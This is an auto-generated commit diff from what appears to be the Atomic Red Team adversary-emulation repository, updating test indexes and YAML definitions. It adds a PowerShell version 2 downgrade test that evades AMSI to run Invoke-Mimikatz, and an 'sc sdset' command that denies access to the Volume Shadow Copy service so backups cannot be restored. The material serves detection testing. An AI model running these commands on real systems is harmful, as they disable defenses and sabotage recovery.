Generated docs from job=generate-docs branch=master [ci skip]

2024-01-31 23:27:05 +00:00
parent 24c9dc3212
commit ed9cb8cdc7
12 changed files with 256 additions and 163 deletions
@@ -364,6 +364,7 @@ defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-40
 defense-evasion,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,3,PowerShell Version 2 Downgrade,47c96489-2f55-4774-a6df-39faff428f6f,powershell
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -919,17 +920,16 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell X
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
@@ -1835,6 +1835,7 @@ impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebacku
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
+impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,sh
@@ -244,6 +244,7 @@ defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
 defense-evasion,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,3,PowerShell Version 2 Downgrade,47c96489-2f55-4774-a6df-39faff428f6f,powershell
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -620,17 +621,16 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell X
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
-execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
 execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
 execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
@@ -1207,6 +1207,7 @@ impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebacku
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
+impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
@@ -465,6 +465,7 @@
 - [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
  - Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]
  - Atomic Test #2: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI [linux]
+  - Atomic Test #3: PowerShell Version 2 Downgrade [windows]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -1241,17 +1242,16 @@
  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: PowerShell Downgrade Attack [windows]
-  - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
-  - Atomic Test #14: PowerShell Session Creation and Use [windows]
-  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
-  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
-  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
-  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
-  - Atomic Test #19: PowerShell Command Execution [windows]
-  - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
-  - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
-  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
+  - Atomic Test #12: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #13: PowerShell Session Creation and Use [windows]
+  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
+  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
+  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
+  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #18: PowerShell Command Execution [windows]
+  - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #20: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #21: Abuse Nslookup with DNS Records [windows]
 - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
  - Atomic Test #1: Create Systemd Service and Timer [linux]
  - Atomic Test #2: Create a user level transient systemd service and timer [linux]
@@ -2628,6 +2628,7 @@
  - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
  - Atomic Test #9: Disable System Restore Through Registry [windows]
  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
+  - Atomic Test #11: Modify VSS Service Permissions [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -321,7 +321,8 @@
 - [T1055.002 Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md)
  - Atomic Test #1: Portable Executable Injection [windows]
 - T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
+  - Atomic Test #3: PowerShell Version 2 Downgrade [windows]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -859,17 +860,16 @@
  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: PowerShell Downgrade Attack [windows]
-  - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
-  - Atomic Test #14: PowerShell Session Creation and Use [windows]
-  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
-  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
-  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
-  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
-  - Atomic Test #19: PowerShell Command Execution [windows]
-  - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
-  - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
-  - Atomic Test #22: Abuse Nslookup with DNS Records [windows]
+  - Atomic Test #12: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #13: PowerShell Session Creation and Use [windows]
+  - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
+  - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
+  - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
+  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #18: PowerShell Command Execution [windows]
+  - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #20: PowerUp Invoke-AllChecks [windows]
+  - Atomic Test #21: Abuse Nslookup with DNS Records [windows]
 - [T1559 Inter-Process Communication](../../T1559/T1559.md)
  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
@@ -1758,6 +1758,7 @@
  - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
  - Atomic Test #9: Disable System Restore Through Registry [windows]
  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
+  - Atomic Test #11: Modify VSS Service Permissions [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -77,7 +77,7 @@
 |  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) |  |  |  |  |  |  |  |
 |  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) |  | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) |  |  |  |  |  |  |  |
 |  |  | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) |  | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -17020,6 +17020,31 @@ defense-evasion:

          '
        name: command_prompt
+    - name: PowerShell Version 2 Downgrade
+      auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f
+      description: Executes outdated PowerShell Version 2 which does not support security
+        features like AMSI. By default the atomic will attempt to execute the cmdlet
+        Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by
+        AMSI when active.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Check if Version 2 is installed.
+        prereq_command: |
+          $v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
+          if (-not $v2_installed) {exit 1} else {exit 0}
+        get_prereq_command: 'echo "Manually install PowerShell Version 2"
+
+          '
+      executor:
+        command: PowerShell -version 2 -command '#{v2_command}'
+        name: powershell
+        elevation_required: false
+      input_arguments:
+        v2_command:
+          description: Specify the command to execute with Version 2
+          type: string
+          default: Invoke-Mimikatz
  T1497:
    technique:
      x_mitre_platforms:
@@ -50698,31 +50723,6 @@ execution:
          Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
          Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
        name: powershell
-    - name: PowerShell Downgrade Attack
-      auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
-      description: |
-        This test requires the manual installation of PowerShell V2.
-
-        Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-      supported_platforms:
-      - windows
-      dependencies:
-      - description: 'PowerShell version 2 must be installed
-
-          '
-        prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: 'Write-Host  Automated installer not implemented yet,
-          please install PowerShell v2 manually
-
-          '
-      executor:
-        command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
-
-          '
-        name: powershell
    - name: NTFS Alternate Data Stream Access
      auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
      description: 'Creates a file with an alternate data stream and simulates executing
@@ -107778,6 +107778,28 @@ impact:
        command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
        name: powershell
        elevation_required: true
+    - name: Modify VSS Service Permissions
+      auto_generated_guid: a4420f93-5386-4290-b780-f4f66abc7070
+      description: |
+        This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
+        - Deny Generic All (GA) permissions to Network Users (NU)
+        - Deny GA permissions to Everyone (WD)
+        - Deny GA permissions to Anonymous (AN)
+        - Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
+        - Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
+        These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
+        A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)
+
+          '
+        cleanup_command: 'sc sdset VSS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;LC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
+
+          '
  T1561.001:
    technique:
      modified: '2023-04-12T23:42:59.868Z'
@@ -13741,7 +13741,32 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1562.010
-    atomic_tests: []
+    atomic_tests:
+    - name: PowerShell Version 2 Downgrade
+      auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f
+      description: Executes outdated PowerShell Version 2 which does not support security
+        features like AMSI. By default the atomic will attempt to execute the cmdlet
+        Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by
+        AMSI when active.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Check if Version 2 is installed.
+        prereq_command: |
+          $v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
+          if (-not $v2_installed) {exit 1} else {exit 0}
+        get_prereq_command: 'echo "Manually install PowerShell Version 2"
+
+          '
+      executor:
+        command: PowerShell -version 2 -command '#{v2_command}'
+        name: powershell
+        elevation_required: false
+      input_arguments:
+        v2_command:
+          description: Specify the command to execute with Version 2
+          type: string
+          default: Invoke-Mimikatz
  T1497:
    technique:
      x_mitre_platforms:
@@ -41853,31 +41878,6 @@ execution:
          Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
          Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
        name: powershell
-    - name: PowerShell Downgrade Attack
-      auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
-      description: |
-        This test requires the manual installation of PowerShell V2.
-
-        Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-      supported_platforms:
-      - windows
-      dependencies:
-      - description: 'PowerShell version 2 must be installed
-
-          '
-        prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
-          0} else {exit 1}
-
-          '
-        get_prereq_command: 'Write-Host  Automated installer not implemented yet,
-          please install PowerShell v2 manually
-
-          '
-      executor:
-        command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
-
-          '
-        name: powershell
    - name: NTFS Alternate Data Stream Access
      auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
      description: 'Creates a file with an alternate data stream and simulates executing
@@ -88529,6 +88529,28 @@ impact:
        command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
        name: powershell
        elevation_required: true
+    - name: Modify VSS Service Permissions
+      auto_generated_guid: a4420f93-5386-4290-b780-f4f66abc7070
+      description: |
+        This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
+        - Deny Generic All (GA) permissions to Network Users (NU)
+        - Deny GA permissions to Everyone (WD)
+        - Deny GA permissions to Anonymous (AN)
+        - Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
+        - Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
+        These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
+        A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
